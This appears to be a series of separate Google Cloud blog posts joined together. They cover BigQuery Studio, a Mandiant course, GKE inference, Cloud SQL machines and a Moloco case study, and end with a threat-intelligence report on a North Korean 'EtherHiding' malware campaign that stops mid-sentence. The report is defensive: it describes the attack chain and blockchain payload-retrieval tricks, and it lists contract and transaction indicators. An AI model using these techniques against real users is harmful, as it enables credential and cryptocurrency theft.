We designed BigQuery Studio to give data analysts, data engineers, and data scientists a comprehensive analytics experience within a single, purpose-built platform, helping them transform data into powerful insights.
Today, we’re thrilled to unveil a significant update to the BigQuery Studio, with a simplified and organized console interface to streamline your workflows, enhance your productivity, and give you greater control. Start your day ready to dive into data in an environment built for efficiency, free from the time-consuming sifting through countless queries or searching for the right tables. Come with us on a tour of the new interface, including a new:
Additional Explorer view to simplify data discovery and exploration
Reference panel that brings all the context you need, without context switching
Decluttered UI that gives you more control
Finding your way with the Explorer
Your journey begins with an expanded view of the Explorer, which lets you find and access resources using a full tab with more information about each resource.To view resources within a project, pick the project in the Explorer and choose the resource type you want to explore. A list of the resources shows up in a tab where you can filter or drill down to find what you’re looking for. To see all of your starred resources across projects, simply click “Starred” at the top of the Explorer pane to open the list of starred items. Alongside the new Explorer view, the full resource tree view is still available in the Classic Explorer, accessible by clicking the middle icon at the top of the pane.
As your projects grow, so does the need for efficient searching. The new search capabilities in BigQuery Studio allow you to easily find BigQuery resources. Use the search box in the new Explorer pane to search across all of your BigQuery resources within your organization. Then, filter the results by project and resource type to pinpoint exactly what you need.
To reduce tab proliferation and give you more control over your workspace, clicking on a resource now consistently opens it within the same BigQuery Studio tab. To open multiple results in separate tabs, use ctrl+click (or cmd+click). To prevent the current tab from getting its content replaced, double-click the tab name (you’ll notice that its name changes from italicized to regular font).
Context at your fingertips with the Reference panel
Writing complex queries often involves switching between tabs or running exploratory queries just to remember schema details or column names. The Reference panel eliminates this hassle. It dynamically displays context-aware information about tables and schemas directly within your editors as you write code. This means you have quick access to crucial details, so you can write your query with fewer interruptions.
The Reference panel also lets you generate code without having to copy and paste things like table or column names. To quickly start a new SQL query on a table, click the actions menu at the top of the Reference panel and select “insert query snippet”. The query code is automatically added to your editor. You can also click any field name in the table schema to insert it into your code.
Beyond the highlights: Less clutter and more efficiency
These updates are part of a broader effort to provide you with a clean workspace over which you have more control. In addition, the new BigQuery Studio includes a dedicated Job history tab, accessible from the new Explorer pane, providing a bigger view of jobs and reducing clutter by removing the bottom panel. You can also fully collapse the Explorer panel to gain more space to focus on your code.
Ready to experience the difference? We invite you to log in to the BigQuery Studio and try the new interface. Check out the Home tab in BigQuery Studio to learn more about these changes. For more details and to deepen your understanding, be sure to explore our documentation. Any feedback? Email us at bigquery-explorer-feedback@google.com.
For too long, network data analysis has felt less like a science and more like deciphering cryptic clues. To help close that gap, we’re introducing a new Mandiant Academy course from Google Cloud, designed to replace frustration with clarity and confidence.
We’ve designed the course specifically for cybersecurity professionals who need to quickly and effectively enhance network traffic analysis skills. You’ll learn to cut through the noise, identify malicious fingerprints with higher accuracy, and fortify your organization’s defenses by integrating critical cyber threat intelligence (CTI).
What you’ll learn
This track includes four courses that provide practical methods to analyze networks and operationalize CTI. Students will explore five proven methodologies to network analysis:
Packet capture (PCAP)
Network flow (netflow)
Protocol analysis
Baseline and behavioral
Historical analysis
Incorporating common tools, we demonstrate how to enrich each methodology adding CTI, and how analytical tradecraft enhances investigations.
The first course, Decoding Network Defense, refreshes foundational CTI principles and the five core network traffic analysis methodologies.
The second course, Analyzing the Digital Battlefield, investigates PCAP, netflow, and protocol before exploring how CTI enriches new evidence.
In the third course, Insights into Adversaries, students learn to translate complex human behaviors into detectable signatures.
The final course, The Defender’s Arsenal, introduces essential tools for those on the frontline, protecting their network’s perimeter.
Who should attend this course?
“Protecting the Perimeter” was developed for practitioners whose daily work is to interpret network telemetry from multiple data sources and identify anomalous behavior.This track’s format is designed for professionals who possess enough knowledge and skill to defend networks, but have limited time to continue education and enhance their abilities.
This training track is the second release from Mandiant Academy’s new approach to on-demand training which concentrates complex security concepts into short-form courses.
Sign up today
To learn more about and register for the course, please visit the Mandiant Academy website. You can also access Mandiant Academy’s on-demand, instructor-led, and experiential training options. We hope this course proves helpful in your efforts to defend your organization against cyber threats.
Deploying LLM workloads can be complex and costly, often involving a lengthy, multi-step process. To solve this, Google Kubernetes Engine (GKE) offers Inference Quickstart.
With Inference Quickstart, you can replace months of manual trial-and-error with out-of-the-box manifests and data-driven insights. Inference Quickstart integrates with the Gemini CLI through native Model Context Protocol (MCP) support to offer tailored recommendations for your LLM workload cost and performance needs. Together, these tools empower you to analyze, select, and deploy your LLMs on GKE in a matter of minutes. Here’s how.
1. Select and serve your LLM on GKE via Gemini CLI
You can install the gemini cli and gke-mcp server with the following steps:
Here are some example prompts that you can give Gemini CLI to select an LLM workload and generate the manifest needed to deploy the model to a GKE cluster:
code_block
<ListValue: [StructValue([(‘code’, “1. What are the 3 cheapest models available on GKE Inference Quickstart? Can you provide all of the related performance data and accelerators they ran on?rn2. How does this model’s performance compare when it was run on different accelerators?rn3. How do I choose between these 2 models?rn4. I’d like to generate a manifest for this model on this accelerator and save it to the current directory.”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f7e3038cee0>)])]>
This video below shows an end-to-end example of how you can quickly identify and deploy your optimal LLM workload to a pre-existing GKE cluster via this Gemini CLI setup:
Choosing the right hardware for your inference workload means balancing performance and cost. The trade-off is nonlinear. To simplify this complex trade-off, Inference Quickstart provides performance and cost insights across various accelerators, all backed by Google’s benchmarks.
For example, as shown in the graph below, minimizing latency for a model like Gemma 3 4b on vLLM dramatically increases cost. This is because achieving ultra-low latency requires sacrificing the efficiency of request batching, which leaves your accelerators underutilized. Request load, model size, architecture, and workload characteristics can all impact which accelerator is optimal for your specific use case.
To make an informed decision, you can get instant, data-driven recommendations by asking Gemini CLI or using the Inference Quickstart Colab notebook.
3. Calculate cost per input/output token
When you host your own model on a platform like GKE, you are billed for accelerator time, not for each individual token. Inference Quickstart calculates cost per token using the accelerator’s hourly cost and the input/output throughput.
The following formula attributes the total accelerator cost to both input and output tokens:
This formula assumes an output token costs four times as much as an input token. The reason for this heuristic is that the prefill phase (processing input tokens) is a highly parallel operation, whereas the decode phase (generating output tokens) is a sequential, auto-regressive process. You can ask Gemini CLI to change this ratio for you to fit your workload’s expected input/output ratio.
The key to cost-effective LLM inference is to take a data-driven approach. By relying on benchmarks for your workloads and using metrics like cost per token, you can make informed decisions that directly impact your budget and performance.
Next steps
GKE Inference Quickstart goes beyond cost insights and Gemini CLI integration, including optimizations for storage, autoscaling, and observability. Run your LLM workloads today with GKE Inference Quickstart to see how it can expedite and optimize your LLMs on GKE.
For today’s business-critical database workloads, the bar that their infrastructure must meet has never been higher. Organizations expect systems that are performant, cost-efficient, scalable and secure. But meeting those expectations is no small feat. Surging data volumes, increasingly complex workloads, and new demands from advanced analytics and vector search for generative AI are intensifying the pressure on database performance. These trends necessitate greater computing power for running high performance database workloads.
We continue to bring new innovations and performance improvements to both Cloud SQL Enterprise Plus and Enterprise editions. Today, we’re excited to deliver substantial efficiency gains to your database operations with the general availability of the C4A machine series, powered by Google Axion processors, for Cloud SQL Enterprise Plus edition, and the N4 machine series for Cloud SQL Enterprise edition. The existing Cloud SQL Enterprise edition machines will now be available as “General Purpose” machine series under Cloud SQL Enterprise edition with no changes to feature or pricing.
Cloud SQL Enterprise Plus edition running on Axion-based C4A virtual machines delivers up to 48% better price-performance than N2 machine series for transactional workloads. Additionally, Cloud SQL Enterprise edition running on N4 machines delivers up to 44% better price-performance for transactional workloads and up to 3x higher throughput performance for read-only workloads as compared to Cloud SQL general purpose machine series.
Axion-powered C4A for Cloud SQL Enterprise Plus
C4A instances bring compelling advantages to managed Google Cloud database workloads. They deliver significant price-performance advantages compared to the N2 machine series and run your critical database workloads with greater speed and lower latency. Purpose-built to handle data-intensive workloads that require real-time processing, C4A instances are well-suited for high-performance databases and demanding analytics engines. The general availability of Axion-based C4A VMs for Cloud SQL Enterprise Plus edition underscores our commitment to infusing this cutting-edge technology for a diverse range of database deployments.
Cloud SQL Enterprise Plus edition for PostgreSQL and MySQL benefit significantly from Axion C4A instances:
They deliver up to 2x higher throughput performance and up to 65% better price-performance versus Amazon’s Graviton4 based offerings.
They also deliver up to 48% better price-performance over N2 machines for transactional workloads.
N4 machines for Cloud SQL Enterprise
N4 machine series are powered by the fifth-generation Intel Xeon Scalable processor, and support PostgreSQL, MySQL and SQL Server engines for Cloud SQL Enterprise edition. Compared to Cloud SQL general purpose machine series, N4 machines deliver up to 44% better price-performance for transactional workloads and up to 3x higher throughput performance for read-only workloads.
Amplify performance with Hyperdisk Balanced storage
To further boost performance of I/O intensive workloads, both C4A and N4 machine series support the latest generation Hyperdisk Balanced storage. This combination enables higher disk performance while simultaneously lowering disk costs.
Hyperdisk Balanced provides up to 1.6x higher IOPS and up to 2x higher throughput as compared to SSD offerings that are available for Cloud SQL Enterprise Plus and Enterprise editions. Hyperdisk Balanced for Cloud SQL also helps you optimize disk costs by letting you independently configure capacity, throughput, and IOPS to match your workload requirements.
What customers are saying
We’re proud to partner with industry leaders to bring this technology to market. Check out what our customers are saying about the performance gains and efficiency improvements they’re seeing on the new C4A machines:
“As Germany’s leading chain of general practitioner clinics, Avi Medical depends on fast, highly available data to provide seamless patient care. That’s why we moved our existing Cloud SQL servers to C4A machines, slashing our database costs by 35% and cutting user latency by 20%. This powerful optimization delivered a significantly faster experience for our healthcare professionals while driving down operational expenses.” – Patrick Palacin, Managing Director, Avi Tech GmbH
“At SpareRoom, the leading room and roommate finder, the performance and efficiency of our platform are paramount. To support our scale and enhance customer experience, we continuously seek to improve key application components. While testing Cloud SQL Enterprise Plus edition running on C4A Axion machines, we saw 10% to 50% faster response times and a 40% to 150% increase in maximum throughput for multi-threaded workloads compared to our current Cloud SQL instances. Cloud SQL C4A also provides the granular control we need over storage performance, enabling us to align it perfectly with the requirements of our diverse workloads. With similar per-core and per-memory costs, the performance boost clearly makes C4A a better value for us.” – Dimitrios Kechagias, Principal Developer, Cloud Infrastructure Optimisation Lead, SpareRoom
“Synspective designs, builds, and operates a fleet of [Synthetic Aperture Radar] satellites to detect and understand changes across the globe. Our services help organizations derive critical insights from large volumes of data. We rely on Cloud SQL’s high performance databases to deliver our services worldwide. Our evaluation of Cloud SQL C4A Axion machines for our workload showed a 50% improvement in query-execution performance and a nearly 50% reduction in CPU utilization compared to our existing Cloud SQL instances. We are thrilled with these results, which give us the performance and efficiency we need to continue innovating on Google Cloud.” – Masaya Arai, Principal Cloud Architect, Synspective Inc.
Ready to get started? Visit the Google Cloud console and create a Cloud SQL instance with just a few clicks. New Google Cloud customers can start afree trial and receive $300 in free credits.
The retail media landscape has reached an inflection point. What started as a way for retailers to monetize their digital real estate has become the fastest-growing segment of digital advertising, with projections showing 21.9% growth in 2025 and a three-year compound annual growth rate of 19.7% through 2027, according to Dentsu’s Global Ad Spend Forecasts Report, December 2024. Yet, many retailers find themselves caught in a frustrating paradox: they possess rich first-party data but lack the infrastructure to monetize it effectively at scale.
Legacy advertising stacks, fragmented infrastructure, and limited machine learning capabilities prevent them from competing with established leaders like Amazon and Walmart. To build profitable, performant on-site advertising businesses, retailers need real-time personalization and measurable ROI – capabilities that require sophisticated AI infrastructure most don’t have in-house.
This is where the partnership between Moloco and Google Cloud delivers significant value. Moloco is an AI-native retail media platform, built from the ground up to deliver one-to-one ad personalization in real-time. Leveraging Google Cloud’s advanced infrastructure, the platform uses TPUs (Tensor Processing Units) and GPUs (Graphics Processing Units) for training and scoring, while Vector Search operates efficiently on CPUs (Central Processing Units). This enables outcomes-based bidding at scale, without requiring retailers to build in-house AI expertise.
The results demonstrate clear value: ~10x increase in capacity, up to ~25% lower p95 latency, and 4% revenue uplift. This blog explores how the joint architecture is reshaping retail media and delivering real-world business impact.
High expectations, limited infrastructure
Retailers face mounting pressure from multiple directions. Declining margins drive the need for new revenue streams, while complex ad tech environments make monetizing first-party data more challenging. Many hit effectiveness ceilings as their advertising spend scales, unable to maintain performance without sophisticated personalization.
Meanwhile, advertisers demand closed-loop measurement and proven ROI – capabilities that require advanced infrastructure most retailers simply don’t possess.
“The sheer scale of modern retail catalogs and the expectation of instantaneous, relevant results have pushed traditional search systems to their limits,” Farhad Kasad, an engineering manager for Vertex AI at Google Cloud, said “To solve this, retailers need to think in terms of semantic understanding. Vertex AI vector search provides the foundational infrastructure to handle billions of items and queries with ultra-low latency, enabling the move from simple keyword matching to truly understanding the context behind a search and delivering hyper-personalized results.”
Addressing this infrastructure opportunity enables retailers to build sustainable, competitive retail media businesses.
Moloco Commerce Media meets Vertex AI Vector Search
Moloco offers an end-to-end, AI-native retail media platform specifically designed to address this challenge. Rather than retrofitting existing systems with AI capabilities, Moloco built its platform from the ground up to use artificial intelligence for every aspect of ad delivery and optimization.
The platform’s integration with Google Cloud’s Vertex AI vector search creates a powerful foundation for semantic ad retrieval and matching. This combination supports hyper-personalized ads and product recommendations by understanding the contextual meaning behind user queries and behaviors, not just matching keywords.
The architecture simplifies what was previously a complex, resource-intensive process. Retailers can focus on their core business while leveraging enterprise-grade, fully managed services that scale automatically with their business needs, rather than building and maintaining their own vector databases.
Simplified architecture and scalable, managed vector search dramatically improve system performance and developer experience.
How vector search improves ad performance
Vector Search represents a major shift from traditional keyword-based matching to semantic understanding. Instead of relying solely on exact text matches, Vector Search converts products, user behaviors, and search queries into mathematical representations (vectors) that capture meaning and context.
This approach enables several breakthrough capabilities for retail media:
Real-time relevance at scale: Vector Search can process millions of product-ad combinations in milliseconds, identifying the most contextually relevant matches based on user behavior, product attributes, and advertiser goals.
Semantic understanding: The system understands that a user searching for “running gear” might be interested in advertisements for athletic shoes, moisture-wicking shirts, or fitness trackers – even if those exact terms don’t appear in the query.
Hybrid search architecture: By combining dense vector representations (semantic meaning) with sparse keyword matching (exact terms), the platform delivers both contextual relevance and precision matching.
Production-grade performance: Using Google’s ScaNN algorithm, developed by Google Research and used in popular Google services, retailers gain access to battle-tested infrastructure without the complexity of building it themselves.
Fully managed infrastructure: Reduces operational overhead while providing enterprise-grade security, reliability, and scalability that grows with retail media program success.
Imsung Choi, Staff Software Engineer at Moloco, explained: “By migrating to Google Cloud Platform’s Vertex AI vector search, we increased capacity by ~10x. Some customers even saw up to ~25% lower p95 latency.”
The operational benefits proved equally significant. As Mingtian Ni, Senior Staff Software Engineer at Moloco, noted: “The managed nature of Google Cloud Platform’s Vector Search simplified our system architecture significantly. We no longer need to manage infrastructure or optimize indexes manually; operations are more stable and scalable.”
Better together with Google Cloud
Moloco’s success stems from deep integration with Google Cloud’s AI infrastructure – specifically Vertex AI Vector Search and ScaNN. By combining Moloco’s deep learning expertise with Google’s scalable, production-grade machine learning tools, retailers can launch performant, AI-native ad businesses faster than ever.
Google Cloud provides the foundation: fast, reliable vector retrieval, managed index updates, and enterprise security. Moloco builds the application layer that transforms these capabilities into measurable business outcomes: increased monetization, reduced latency, and future-proof personalization.
Together, Moloco and Google Cloud help retailers transform first-party data into meaningful, real-time value without requiring substantial internal AI investments or custom infrastructure development. Retailers maintain full control of their first-party data, with our platform processing it strictly according to their instructions and enforcing tenant isolation to ensure security and data separation.
Moloco’s Vector Search migration and impact
In internal benchmarks and select production deployments, migration to Vertex AI Vector Search delivered measurable improvements across key performance metrics:
~10x increase in capacity, ensuring even retailers with extensive product catalogs can deliver personalized advertising experiences without performance degradation.
Up to ~25% lowerp95 latency in ad serving, critical for maintaining user engagement and ad effectiveness in real-time bidding scenarios.
4.0% monetization uplift in ad revenue across several rollouts.
While results vary by catalog size and traffic, these advancements demonstrate that technical improvements translate directly to business value.
Business impact for retail leaders
For CROs and CMOs, this infrastructure delivers the revenue growth and advertiser ROI that budget approvals depend on. Improved ad relevance drives higher click-through rates and conversion, making advertising inventory more valuable to brand partners. As a result, Moloco consistently enables retailers to achieve ad revenue growth that outpaces traditional solutions by delivering a 4% uplift, making it a truly transformational force for their businesses.
Heads of retail media gain the measurable performance metrics and scalable infrastructure needed to compete with established players. Platform reliability and speed become competitive advantages rather than operational headaches.
CEOs and CFOs see long-term value from platform monetization that doesn’t require ongoing technical investment. The managed infrastructure scales with business growth while providing predictable operational costs.
Technical impact for engineering and data teams
Platform architects benefit from scalable, low-latency infrastructure that avoids custom data pipelines that are difficult to maintain. The managed service reduces technical debt while supporting business growth.
Data scientists gain access to semantically rich, machine learning-ready vector search that improves ad relevance and personalization accuracy without requiring vector database expertise.
Machine learning engineers can use pre-tuned infrastructure like ScaNN to reduce time-to-value on retrieval models, focusing on business logic rather than infrastructure optimization.
DevOps and site reliability engineers appreciate fully managed services that reduce operational overhead while ensuring high availability for revenue-critical systems.
Technical leads value easy integration with existing Google Cloud Platform tools like BigQuery, Vertex AI, and Dataflow for unified data workflows.
Security and compliance teams get end-to-end policy controls and observability across data pipelines and ad targeting logic, essential for handling sensitive customer data.
Industry trends making this a must-have
Several converging trends highlight the strategic value of AI-native retail media infrastructure:
The demise of third-party cookies increases the strategic value of first-party data, but only for retailers who can activate it effectively for advertising personalization and targeting.
Generative AI adoption accelerates the need for vector-powered search and recommendation systems. As customers become accustomed to AI-powered experiences in other contexts, they expect similar sophistication in their shopping experiences.
Rising demand for personalization, shoppable content, and ad relevance creates pressure for real-time, context-aware systems that can adapt quickly to changing user behavior and inventory conditions.
ROI-driven advertising budgets put performance pressure on every aspect of the ad stack. Advertisers demand clear attribution and measurable results, pushing retailers to invest in infrastructure that provides closed-loop measurement and optimization capabilities.
The future of retail media is AI-Native
AI-native advertising technology has evolved from competitive advantage to strategic necessity. Retailers that rely on legacy systems risk falling behind competitors who can deliver superior personalization, measurement, and scale.
The partnership between Moloco and Google Cloud demonstrates how specialized AI expertise can combine with cloud-native infrastructure to deliver capabilities that would be prohibitively expensive and complex for most retailers to build independently. The managed service model ensures that retailers can access cutting-edge AI capabilities while focusing their internal resources on customer experience and business growth.
Moloco represents the next generation of Retail Media Networks (RMN) solutions, expanding what is possible for retailers with AI-powered technology. Google Cloud is proud to partner in helping them scale a differentiated, AI-native retail media solution that delivers real business results. As the retail media landscape continues to evolve, partnerships like this will define which retailers can successfully monetize their first-party data at scale.
Get Started
Moloco’s integration with Vertex AI Vector Search is available through the Google Cloud Marketplace.Explore the capabilities of Google Cloud’s Vertex AI Vector Search.
Written by: Blas Kojusner, Robert Wallace, Joseph Dobson
Google Threat Intelligence Group (GTIG) has observed the North Korea (DPRK) threat actor UNC5342 using ‘EtherHiding’ to deliver malware and facilitate cryptocurrency theft, the first time GTIG has observed a nation-state actor adopting this method. This post is part of a two-part blog series on adversaries using EtherHiding, a technique that leverages transactions on public blockchains to store and retrieve malicious payloads—notable for its resilience against conventional takedown and blocklisting efforts. Read about UNC5142 campaign leveraging EtherHiding to distribute malware.
Since February 2025, GTIG has tracked UNC5342 incorporating EtherHiding into an ongoing social engineering campaign, dubbed Contagious Interview by Palo Alto Networks. In this campaign, the actor uses JADESNOW malware to deploy a JavaScript variant of INVISIBLEFERRET, which has led to numerous cryptocurrency heists.
How EtherHiding Works
EtherHiding emerged in September 2023 as a key component in the financially motivated CLEARFAKE campaign (UNC5142), which uses deceptive overlays, like fake browser update prompts, to manipulate users into executing malicious code.
EtherHiding involves embedding malicious code, often in the form of JavaScript payloads, within a smart contract on a public blockchain like BNB Smart Chain or Ethereum. This approach essentially turns the blockchain into a decentralized and highly resilient command-and-control (C2) server.
The typical attack chain unfolds as follows:
Initial Compromise: DPRK threat actors typically utilize social engineering for their initial compromise (e.g., fake job interviews, crypto games, etc.). Additionally, in the CLEARFAKE campaign, the attacker first gains access to a legitimate website, commonly a WordPress site, through vulnerabilities or stolen credentials.
Injection of a Loader Script: The attacker injects a small piece of JavaScript code, often referred to as a “loader,” into the compromised website.
Fetching the Malicious Payload: When a user visits the compromised website, the loader script executes in their browser. This script then communicates with the blockchain to retrieve the main malicious payload stored in a remote server. A key aspect of this step is the use of a read-only function call (such as eth_call), which does not create a transaction on the blockchain. This ensures the retrieval of the malware is stealthy and avoids transaction fees (i.e. gas fees).
Payload Execution: Once fetched, the malicious payload is executed on the victim’s computer. This can lead to various malicious activities, such as displaying fake login pages, installing information-stealing malware, or deploying ransomware.
Advantages for Attackers
EtherHiding offers several significant advantages to attackers, positioning it as a particularly challenging threat to mitigate:
Decentralization and Resilience: Because malicious code is stored on a decentralized and permissionless blockchain, there is no central server that law enforcement or cybersecurity firms can take down. The malicious code remains accessible as long as the blockchain itself is operational.
Anonymity: The pseudonymous nature of blockchain transactions makes it difficult to trace the identity of the attackers who deployed the smart contract.
Immutability: Once a smart contract is deployed, the malicious code within it typically cannot be easily removed or altered by anyone other than the contract owner.
Stealth: Attackers can retrieve the malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making their activities harder to track.
Flexibility: The attacker who controls the smart contract can update the malicious payload at any time. This allows them to change their attack methods, update domains, or deploy different types of malware to compromised websites simultaneously by simply updating the smart contract.
In essence, EtherHiding represents a shift toward next-generation bulletproof hosting, where the inherent features of blockchain technology are repurposed for malicious ends. This technique underscores the continuous evolution of cyber threats as attackers adapt and leverage new technologies to their advantage.
DPRK Social Engineering Campaign
North Korea’s social engineering campaign is a sophisticated and ongoing cyber espionage and financially motivated operation that cleverly exploits the job application and interview process. This campaign targets developers, particularly in the cryptocurrency and technology sectors, to steal sensitive data, cryptocurrency, and gain persistent access to corporate networks.
The campaign has a dual purpose that aligns with North Korea’s strategic goals:
Financial Gain: A primary objective is the theft of cryptocurrency and other financial assets to generate revenue for the regime, helping it bypass international sanctions.
Espionage: By compromising developers, the campaign aims to gather valuable intelligence and potentially gain a foothold in technology companies for future operations.
The campaign is characterized by its elaborate social engineering tactics that mimic legitimate recruitment processes.
1. The Phishing Lure:
Fake Recruiters and Companies: The threat actors create convincing but fraudulent profiles on professional networking sites like LinkedIn and job boards. They often impersonate recruiters from well-known tech or cryptocurrency firms.
Fabricated Companies: In some instances, they have gone as far as setting up fake company websites and social media presences for entities like “BlockNovas LLC,” “Angeloper Agency,” and “SoftGlideLLC” to appear legitimate.
Targeted Outreach: They aggressively contact potential victims, such as software and web developers, with attractive job offers.
2. The Interview Process:
Initial Engagement: The fake recruiters engage with candidates, often moving the conversation to platforms like Telegram or Discord.
The Malicious Task: The core of the attack occurs during a technical assessment phase. Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub. These files contain malicious code.
Deceptive Tools: In other variations, candidates are invited to a video interview and are prompted with a fake error message (a technique called ClickFix) that requires them to download a supposed “fix” or a specific software to proceed, which is actually the malware.
3. The Infection Chain:
The campaign employs a multi-stage malware infection process to compromise the victim’s system, often affecting Windows, macOS, and Linux systems.
Initial Downloader (e.g.,JADESNOW): The malicious packages downloaded by the victim are often hosted on the npm (Node Package Manager) registry. These loaders may collect initial system information and download the next stage of malware.
Second-Stage Malware (e.g.,BEAVERTAIL, JADESNOW): The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials. The addition of JADESNOW to the attack chain marks UNC5342’s shift towards EtherHiding to serve up the third-stage backdoor INVISIBLEFERRET.
Third-Stage Backdoor (e.g.,INVISIBLEFERRET): For high-value targets, a more persistent backdoor is deployed. INVISIBLEFERRET, a Python-based backdoor, provides the attackers remote control over the compromised system, allowing for long-term espionage, data theft, and lateral movement within a network.
JADESNOW
JADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342. JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted. The final payload in the JADESNOW infection chain is usually a more persistent backdoor like INVISIBLEFERRET.JAVASCRIPT.
The deployment and management of JADESNOW differs from that of similar campaigns that implement EtherHiding, such as CLEARFAKE. The CLEARFAKEcampaign,associated with the threat cluster UNC5142, functions as a malicious JavaScript framework and often masquerades as a Google Chrome browser update pop-up on compromised websites. The primary function of the embedded JavaScript is to download a payload after a user clicks the “Update Chrome” button. The second-stage payload is another Base64-encoded JavaScript stored on the BNB Smart Chain. The final payload may be bundled with other files that form part of a legitimate update, like images or configuration files, but the malware itself is usually an infostealer like LUMASTEALER.
Figure 1 presents a general overview of the social engineering attack chain. The victim receives a malicious interview question, deceiving the victim into running code that executes the initial JavaScript downloader that interacts with a malicious smart contract and downloads the second-stage payload. The smart contract hosts the JADESNOW downloader that interacts with Ethereum to fetch the third-stage payload, in this case INVISIBLEFERRET.JAVASCRIPT. The payload is run in memory and may query Ethereum for an additionalcredential stealercomponent. It is unusual to see a threat actor make use of multiple blockchains for EtherHiding activity; this may indicate operational compartmentalization between teams of North Korean cyber operators. Lastly, campaigns frequently leverage EtherHiding’s flexible nature to update the infection chain and shift payload delivery locations. In one transaction, the JADESNOW downloader can switch from fetching a payload on Ethereum to fetching it on the BNB Smart Chain. This switch not only complicates analysis but also leverages lower transaction fees offered by alternate networks.
Figure 1: UNC5342 EtherHiding on BNB Smart Chain and Ethereum
Malicious Smart Contracts
BNB Smart Chain and Ethereum are both designed to run decentralized applications (dApps) and smart contracts. A smart contract is code on a blockchain that automatically executes actions when certain conditions or agreements are met, enabling secure, transparent, and automated agreements without intermediaries. Smart contracts are compiled into bytecode and uploaded to the blockchain, making them publicly available to be disassembled for analysis.
BNB Smart Chain, like Ethereum, is a decentralized and permissionless blockchain network that supports smart contracts programmed for the Ethereum Virtual Machine (EVM). Although smart contracts offer innovative ways to build decentralized applications, their unchangeable nature is leveraged in EtherHiding to host and serve malicious code in a manner that cannot be easily blocked.
Making use of Ethereum and BNB Smart Chain for the purpose of EtherHiding is straightforward since it simply involves calling a custom smart contract on the blockchain. UNC5342’s interactions with the blockchain networks are done through centralized API service providers rather than Remote Procedure Call (RPC) endpoints, as seen with CLEARFAKE. When contacted by GTIG, responsible API service providers were quick to take action against this malicious activity; however, several other platforms have remained unresponsive. This indifference and lack of collaboration is a significant concern, as it increases the risk of this technique proliferating among threat actors.
JADESNOW On-Chain Analysis
The initial downloader queries the BNB Smart Chain through a variety of API providers, including Binplorer, to read the JADESNOW payload stored at the smart contract at address 0x8eac3198dd72f3e07108c4c7cff43108ad48a71c.
Figure 2 is an example of an API call to read data stored in the smart contract from the transaction history. The transaction details show that the contract has been updated over 20 times within the first four months, with each update costing an average of $1.37 USD in gas fees. The low cost and frequency of these updates illustrate the attacker’s ability to easily change the campaign’s configuration. This smart contract has also been linked to a software supply chain attack that impacted React Native Aria and GlueStack via compromised npm packages in June 2025
Blockchain explorers like BscScan (for BNB Smart Chain) and Etherscan (for Ethereum) are essential tools for reviewing on-chain information like smart contract code and historic transactions to and from the contract. These transactions may include input data such as a variable Name, its Type, and the Data stored in that variable. Figure 3 shows on-chain activity at the transaction address 0x5c77567fcf00c317b8156df8e00838105f16fdd4fbbc6cd83d624225397d8856, where the Data field contains a Base64-encoded and XOR-encrypted message. This message decrypts to a heavily obfuscated JavaScript payload that GTIG assesses as the second-stage downloader, JADESNOW.
Figure 3: UNC5342 on-chain activity
When comparing transactions, the launcher-related code remains intact, but the next stage payload is frequently updated with a new obfuscated payload. In this case, the obfuscated payload is run in memory and decrypts an array of strings that combine to form API calls to different transaction hashes on Ethereum. This pivot to a different network is notable. The attackers are not using an Ethereum smart contract to store the payload; instead, they perform a GET request to query the transaction history of their attacker-controlled address and read the calldata stored from transactions made to the well-known “burn” address 0x00…dEaD.
Figure 4: On-chain transactions
The final address of these transactions is inconsequential since the malware only reads the data stored in the details of a transaction, effectively using the blockchain transaction as a Dead Drop Resolver. These transactions are generated frequently, showing how easily the campaign can be updated with a simple blockchain transaction, including changing the C2 server.
The in-memory payload fetches and evaluates the information stored on-chain by querying Ethereum via different blockchain explorer APIs. Multiple explorers are queried simultaneously (including Blockchair, Blockcypher, and Ethplorer), likely as a fail-safe way to ensure payload retrieval. The use of a free API key, such as apiKey=freekey offered by Ethplorer for development, is sufficient for the JADESNOW operation despite strict usage limits.
Payload Analysis
The third stage is the INVISIBLEFERRET.JAVASCRIPT payload stored at the Ethereum transaction address 0x86d1a21fd151e344ccc0778fd018c281db9d40b6ccd4bdd3588cb40fade1a33a. This payload connects to the C2 server via port 3306, the default port for MySQL. It sends an initial beacon with the victim’s hostname, username, operating system, and the directory the backdoor is currently running under. The backdoor proceeds to run in the background, listening for incoming commands to the C2. The command handler is capable of processing arbitrary command execution, executing built-in commands to change the directory, and exfiltrating files, directories, and subdirectories from the victim’s system.
The INVISIBLEFERRET.JAVASCRIPT payload may also be split into different components like is done at the transaction address 0xc2da361c40279a4f2f84448791377652f2bf41f06d18f19941a96c720228cd0f. The split up JavaScript payload executes the INVISIBLEFERRET.JAVASCRIPT backdoor and attempts to install a portable Python interpreter to execute an additional credential stealer component stored at the transaction address 0xf9d432745ea15dbc00ff319417af3763f72fcf8a4debedbfceeef4246847ce41. This additional credential stealer component targets web browsers like Google Chrome and Microsoft Edge to exfiltrate stored passwords, session cookies, and credit cards. The INVISIBLEFERRET.JAVASCRIPT credential stealer component also targets cryptocurrency wallets like MetaMask and Phantom, as well as credentials from other sensitive applications like password managers (e.g., 1Password). The data is compressed into a ZIP archive and uploaded to an attacker-controlled remote server and a private Telegram chat.
The Centralized Dependencies in EtherHiding
Decentralization is a core tenet of blockchain networks and other Web3 technologies. In practice, however, centralized services are often used, which introduces both opportunities and risks. Though blockchains like BNB Smart Chain are immutable and permissionless and the smart contracts deployed onto such blockchains cannot be removed, operations by threat actors using these blockchains are not unstoppable.
Neither North Korea’s UNC5342 nor threat actor UNC5142 are interacting directly with BNB Smart Chain when retrieving information from smart contracts; both threat actors are utilizing centralized services, akin to using traditional Web2 services such as web hosting. This affords astute defenders the opportunity to mitigate such threats. These centralized intermediaries represent points of observation and control, where traffic can be monitored and malicious activity can be addressed through blocking, account suspensions, or other methods. In other words, UNC5142 and UNC5342 are using permissioned services to interact with permissionless blockchains.
These threat actors exhibit two different approaches to utilizing centralized services for interfacing with blockchain networks:
